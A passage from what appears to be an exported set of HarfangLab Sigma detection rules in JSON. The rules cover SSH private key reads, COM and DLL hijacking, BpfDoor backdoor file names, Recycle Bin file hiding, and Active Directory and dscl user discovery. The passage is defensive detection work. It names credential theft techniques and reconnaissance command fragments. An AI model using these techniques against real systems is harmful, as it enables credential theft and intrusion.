'/Applications/Xcode*.app/Contents/SharedFrameworks/DVTSourceControl.framework/Versions/A/XPCServices/com.apple.dt.Xcode.sourcecontrol.Git.xpc/Contents/MacOS/com.apple.dt.Xcode.sourcecontrol.Git'\n - '/Applications/Xcode*.app/Contents/SharedFrameworks/DVTSourceControl.framework/Versions/A/XPCServices/com.apple.dt.Xcode.sourcecontrol.SSHHelper.xpc/Contents/MacOS/com.apple.dt.Xcode.sourcecontrol.SSHHelper'\n exclusion_tabletops:\n Image: '/Applications/TablePlus.app/Contents/MacOS/TablePlus'\n\n exclusion_docker:\n Image: '/Applications/Docker.app/Contents/MacOS/com.docker.backend'\n\n exclusion_filezilla:\n Image:\n - '/Applications/FileZilla.app/Contents/MacOS/fzputtygen'\n - '/Applications/FileZilla.app/Contents/MacOS/fzsftp'\n - '/Users/*/Downloads/FileZilla 2.app/Contents/MacOS/fzsftp'\n\n exclusion_git_misc_app:\n Image:\n - '/Applications/GitKraken.app/Contents/Frameworks/GitKraken Helper (Renderer).app/Contents/MacOS/GitKraken Helper (Renderer)'\n - '/Applications/GitHub Desktop.app/Contents/Frameworks/GitHub Desktop Helper (Renderer).app/Contents/MacOS/GitHub Desktop Helper (Renderer)'\n\n exclusion_flintrock:\n Image|endswith:\n - '/flintrock-*-standalone-macOS-arm64/flintrock'\n - '/usr/local/bin/flintrock'\n\n exclusion_vanta:\n Image: '/usr/local/vanta/osqueryd'\n\n exclusion_rider:\n Image: '/Applications/Rider.app/Contents/MacOS/rider'\n\n exclusion_homebrew:\n Image|startswith: '/opt/homebrew/'\n\n exclusion_bitdefender:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.bitdefender.bddaemon'\n\n exclusion_textedit:\n Image: '/System/Applications/TextEdit.app/Contents/MacOS/TextEdit'\n\n exclusion_ssh:\n Image:\n - '/usr/bin/ssh'\n - '/usr/local/Cellar/openssh/*/bin/ssh'\n\n exclusion_haxm:\n Image: '/usr/local/haxm/*/haxm'\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'Agent_final'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3831a1a6-cce1-43aa-b3f7-73f2c207a8a4",
"rule_name": "SSH Private Key Read (macOS)",
"rule_description": "Detects an attempt to read the content of an SSH private key.\nThe private key is the most important and secretive piece of data used when connecting to a remote host via SSH.\nAn attacker can read the SSH private keys available on a compromised system to connect to other remote hosts and impersonate an existing user or service.\nIt is recommended to verify if the process performing the read operation has legitimate reason to do it.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2025-04-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1552.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "386d04d2-1f3a-463b-a003-5ef7c4109f79",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085652Z",
"creation_date": "2026-03-23T11:45:34.085654Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085658Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.r-tec.net/r-tec-blog-revisiting-cross-session-activation-attacks.html",
"https://attack.mitre.org/techniques/T1546/015/"
],
"name": "t1546_015_com_hijacking_remote_registry.yml",
"content": "title: COM Hijacking via Remote Registry\nid: 386d04d2-1f3a-463b-a003-5ef7c4109f79\ndescription: |\n Detects the modification of the registry key related to a COM interface configuration by the remote registry process.\n Adversaries may use COM hijacking in order to execute comment in the context of a logged on user remotely.\n It is recommended to check the content of the targeted DLL for malicious content as well as to look for suspicious processes spawning after this alert as a result of a successful COM hijack.\nreferences:\n - https://www.r-tec.net/r-tec-blog-revisiting-cross-session-activation-attacks.html\n - https://attack.mitre.org/techniques/T1546/015/\ndate: 2025/07/10\nmodified: 2025/08/20\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.persistence\n - attack.t1546.015\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|contains: '\\Classes\\CLSID\\{????????-????-????-????-????????????}\\'\n ProcessCommandLine:\n - '?:\\WINDOWS\\system32\\svchost.exe -k localService -p -s RemoteRegistry'\n - '?:\\Windows\\system32\\svchost.exe -k LocalService'\n - '?:\\Windows\\system32\\svchost.exe -k regsvc'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "386d04d2-1f3a-463b-a003-5ef7c4109f79",
"rule_name": "COM Hijacking via Remote Registry",
"rule_description": "Detects the modification of the registry key related to a COM interface configuration by the remote registry process.\nAdversaries may use COM hijacking in order to execute comment in the context of a logged on user remotely.\nIt is recommended to check the content of the targeted DLL for malicious content as well as to look for suspicious processes spawning after this alert as a result of a successful COM hijack.\n",
"rule_creation_date": "2025-07-10",
"rule_modified_date": "2025-08-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1546.015"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3894297f-12bc-492b-b25b-554856e8df30",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088159Z",
"creation_date": "2026-03-23T11:45:34.088161Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088165Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.bpfdoor",
"https://dfir.ch/posts/strace/",
"https://blog.qualys.com/vulnerabilities-threat-research/2022/08/01/heres-a-simple-script-to-detect-the-stealthy-nation-state-bpfdoor",
"https://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/",
"https://attack.mitre.org/techniques/T1559/"
],
"name": "t1559_bpfdoor_suspicious_file_creation.yml",
"content": "title: Suspicious Execution Related to BpfDoor\nid: 3894297f-12bc-492b-b25b-554856e8df30\ndescription: |\n Detects the execution of files with names linked to the BpfDoor backdoor.\n BpfDoor is a remote access trojan (RAT) used by the Red Menshen threat actor to target Linux systems since at least 2018.\n This file is executed by BpfDoor as part of its initialization process.\n It is recommended to analyze the process responsible for creating this file and to look for other suspicious activities on the host.\nreferences:\n - https://malpedia.caad.fkie.fraunhofer.de/details/elf.bpfdoor\n - https://dfir.ch/posts/strace/\n - https://blog.qualys.com/vulnerabilities-threat-research/2022/08/01/heres-a-simple-script-to-detect-the-stealthy-nation-state-bpfdoor\n - https://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/\n - https://attack.mitre.org/techniques/T1559/\ndate: 2024/02/02\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1559\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Malware.BpfDoor\n - classification.Linux.Behavior.Persistence\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n - Image: '/dev/shm/kdmtmpflush'\n - CommandLine|contains: '/dev/shm/kdmtmpflush'\n\n # seen launched by ssh and child of nessusd\n exclusion_nessus:\n CommandLine:\n - '*/bin/ls -alR /proc/*/exe 2> /dev/null | grep \"/dev/shm/kdmtmpflush (deleted)\"*'\n - 'grep /dev/shm/kdmtmpflush (deleted)'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3894297f-12bc-492b-b25b-554856e8df30",
"rule_name": "Suspicious Execution Related to BpfDoor",
"rule_description": "Detects the execution of files with names linked to the BpfDoor backdoor.\nBpfDoor is a remote access trojan (RAT) used by the Red Menshen threat actor to target Linux systems since at least 2018.\nThis file is executed by BpfDoor as part of its initialization process.\nIt is recommended to analyze the process responsible for creating this file and to look for other suspicious activities on the host.\n",
"rule_creation_date": "2024-02-02",
"rule_modified_date": "2025-04-08",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3899410e-4d11-427a-b57d-07ca42d4c51f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084966Z",
"creation_date": "2026-03-23T11:45:34.084968Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084972Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos",
"https://attack.mitre.org/techniques/T1564/001/"
],
"name": "t1564_001_suspicious_file_into_recycle_bin.yml",
"content": "title: Suspicious File Created inside Recycle Bin folder\nid: 3899410e-4d11-427a-b57d-07ca42d4c51f\ndescription: |\n Detects a suspicious attempt to create files into the Recycle Bin folder.\n This folder can be used by attackers to hide their files from regular users.\n It is recommended to check the created file for suspicious content as well as to analyze the process at the origin of this creation for other suspicious behavior.\nreferences:\n - https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\n - https://attack.mitre.org/techniques/T1564/001/\ndate: 2021/08/06\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path|startswith: '?:\\\\?Recycle.Bin\\\\*'\n\n exclusion_legitimatefiles:\n Path:\n - '?:\\\\?Recycle.Bin\\S-1-5-18'\n - '?:\\\\?Recycle.Bin\\S-1-*-???'\n - '?:\\\\?Recycle.Bin\\S-1-*-????'\n - '?:\\\\?Recycle.Bin\\S-1-*-?????'\n - '?:\\\\?Recycle.Bin\\S-1-*-??????'\n - '?:\\\\?Recycle.Bin\\S-1-*-???????'\n - '?:\\\\?Recycle.Bin\\S-1-*-????????'\n - '?:\\\\?Recycle.Bin\\S-1-*-?????????'\n - '?:\\\\?Recycle.Bin\\S-1-*-??????????'\n - '?:\\\\?Recycle.Bin\\S-1*\\\\?R*'\n - '?:\\\\?Recycle.Bin\\S-1*\\\\?I*'\n - '?:\\\\?Recycle.Bin\\\\?R*'\n - '?:\\\\?Recycle.Bin\\\\?I*'\n\n exclusion_ahnlab:\n Image: '?:\\Program Files\\AhnLab\\Safe Transaction\\ASDSvc.exe'\n #ProcessParentImage|endswith: '\\services.exe'\n\n exclusion_desktop:\n Path:\n - '?:\\\\?Recycle.Bin\\S-1-*\\desktop.ini'\n - '?:\\\\?Recycle.Bin\\desktop.ini'\n\n exclusion_bromium:\n Image:\n - '?:\\Windows\\explorer.exe'\n - '?:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'\n Path: '*\\~BROMIUM' # HP Bromium\n\n exclusion_office:\n # C:\\$Recycle.Bin\\S-1-5-21-802770577-1178448740-...\\~$$R8V0GFK.xlsb\n # C:\\$Recycle.Bin\\S-1-5-21-802770577-1178448740-...\\~$$RQZH0TL.xlsb\n Image:\n - '?:\\Program Files\\Microsoft Office\\Office1?\\EXCEL.EXE'\n - '?:\\Program Files\\Microsoft Office\\root\\Office1?\\EXCEL.EXE'\n - '?:\\Program Files (x86)\\Microsoft Office\\Office1?\\EXCEL.EXE'\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office1?\\EXCEL.EXE'\n - '?:\\Program Files\\Microsoft Office\\Office1?\\WINWORD.EXE'\n - '?:\\Program Files\\Microsoft Office\\root\\Office1?\\WINWORD.EXE'\n - '?:\\Program Files (x86)\\Microsoft Office\\Office1?\\WINWORD.EXE'\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office1?\\WINWORD.EXE'\n - '?:\\Program Files\\Microsoft Office\\Office1?\\POWERPNT.EXE'\n - '?:\\Program Files\\Microsoft Office\\root\\Office1?\\POWERPNT.EXE'\n - '?:\\Program Files (x86)\\Microsoft Office\\Office1?\\POWERPNT.EXE'\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office1?\\POWERPNT.EXE'\n Path:\n - '*\\~$$???????.xlsb'\n - '*\\~$??????.odt'\n - '*\\~$$???????.pptx'\n\n exclusion_symantec:\n ProcessOriginalFileName: 'ccSvcHst.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Symantec Corporation'\n\n exclusion_rm:\n ProcessImage|endswith: '\\bin\\rm.exe'\n\n exclusion_rsync:\n ProcessImage:\n - '?:\\Program Files (x86)\\cwRsync\\bin\\rsync.exe'\n - '?:\\Program Files (x86)\\ICW\\Bin\\rsync.exe'\n - '?:\\cygwin\\bin\\rsync.exe'\n - '?:\\cygwin64\\bin\\rsync.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3899410e-4d11-427a-b57d-07ca42d4c51f",
"rule_name": "Suspicious File Created inside Recycle Bin folder",
"rule_description": "Detects a suspicious attempt to create files into the Recycle Bin folder.\nThis folder can be used by attackers to hide their files from regular users.\nIt is recommended to check the created file for suspicious content as well as to analyze the process at the origin of this creation for other suspicious behavior.\n",
"rule_creation_date": "2021-08-06",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1564.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "38af1190-9bbe-40bc-8df7-d4fb515ccd0e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090689Z",
"creation_date": "2026-03-23T11:45:34.090691Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090696Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_sgrmbroker.yml",
"content": "title: DLL Hijacking via SgrmBroker.exe\nid: 38af1190-9bbe-40bc-8df7-d4fb515ccd0e\ndescription: |\n Detects potential Windows DLL Hijacking via SgrmBroker.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'SgrmBroker.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ncrypt.dll'\n - '\\tbs.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "38af1190-9bbe-40bc-8df7-d4fb515ccd0e",
"rule_name": "DLL Hijacking via SgrmBroker.exe",
"rule_description": "Detects potential Windows DLL Hijacking via SgrmBroker.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "39035abb-812f-4e80-93a0-a5b682e2caa4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619038Z",
"creation_date": "2026-03-23T11:45:34.619039Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619044Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dmomacpmo.yml",
"content": "title: DLL Hijacking via dmomacpmo.exe\nid: 39035abb-812f-4e80-93a0-a5b682e2caa4\ndescription: |\n Detects potential Windows DLL Hijacking via dmomacpmo.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dmomacpmo.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DEVOBJ.dll'\n - '\\DMCmnUtils.dll'\n - '\\dmEnrollEngine.DLL'\n - '\\DMProcessXMLFiltered.dll'\n - '\\dsclient.dll'\n - '\\iri.dll'\n - '\\msvcp110_win.dll'\n - '\\omadmapi.dll'\n - '\\USERENV.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "39035abb-812f-4e80-93a0-a5b682e2caa4",
"rule_name": "DLL Hijacking via dmomacpmo.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dmomacpmo.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "391f70f4-692c-4114-b801-554f1d003a62",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083272Z",
"creation_date": "2026-03-23T11:45:34.083274Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083279Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://ericazelic.medium.com/ldap-queries-for-offensive-and-defensive-operations-4b035b816814",
"https://blog.talosintelligence.com/emerging-interlock-ransomware/",
"https://attack.mitre.org/techniques/T1018/"
],
"name": "t1018_domain_computer_discovered_powershell.yml",
"content": "title: Domain Computer Discovered via PowerShell\nid: 391f70f4-692c-4114-b801-554f1d003a62\ndescription: |\n Detects the use of PowerShell to enumerate Active Directory computer objects.\n This may indicate reconnaissance activity aimed at identifying systems with specific roles, locations, or functions.\n It is recommended to analyze the parent process as well as other commands executed in the same PowerShell session to look for malicious content or actions.\nreferences:\n - https://ericazelic.medium.com/ldap-queries-for-offensive-and-defensive-operations-4b035b816814\n - https://blog.talosintelligence.com/emerging-interlock-ransomware/\n - https://attack.mitre.org/techniques/T1018/\ndate: 2025/07/09\nmodified: 2025/08/06\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1018\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains|all:\n - '[adsisearcher]'\n - 'objectCategory=computer'\n - '.PropertiesToLoad.Add('\n - '.findAll()'\n\n filter_script:\n PowershellScriptPath|contains: '?'\n\n condition: selection and not 1 of filter_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "391f70f4-692c-4114-b801-554f1d003a62",
"rule_name": "Domain Computer Discovered via PowerShell",
"rule_description": "Detects the use of PowerShell to enumerate Active Directory computer objects.\nThis may indicate reconnaissance activity aimed at identifying systems with specific roles, locations, or functions.\nIt is recommended to analyze the parent process as well as other commands executed in the same PowerShell session to look for malicious content or actions.\n",
"rule_creation_date": "2025-07-09",
"rule_modified_date": "2025-08-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1018"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "394e4403-48b4-4304-8127-3fc432fe70aa",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.294301Z",
"creation_date": "2026-03-23T11:45:35.294305Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294312Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1087/001/",
"https://attack.mitre.org/techniques/T1033/"
],
"name": "t1087_001_dscl_readall_users_macos.yml",
"content": "title: Users Properties Discovered via Dscl\nid: 394e4403-48b4-4304-8127-3fc432fe70aa\ndescription: |\n Detects the execution of the dscl command to list all users and their properties.\n Attackers may use it during the discovery phase of an attack to retrieve a list of users and their properties, such as their Apple ID, which groups they belong to, and their User IDs.\n It is recommended to check for other suspicious activity by the parent process.\nreferences:\n - https://attack.mitre.org/techniques/T1087/001/\n - https://attack.mitre.org/techniques/T1033/\ndate: 2022/12/01\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.001\n - attack.t1033\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Dscl\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n # dscl . -readall users\n # dscl . -readall /Users\n # dscl . -readall /Users some_property\n Image: '/usr/bin/dscl'\n CommandLine|contains|all:\n - 'readall '\n - 'users'\n ParentImage|contains: '?'\n\n 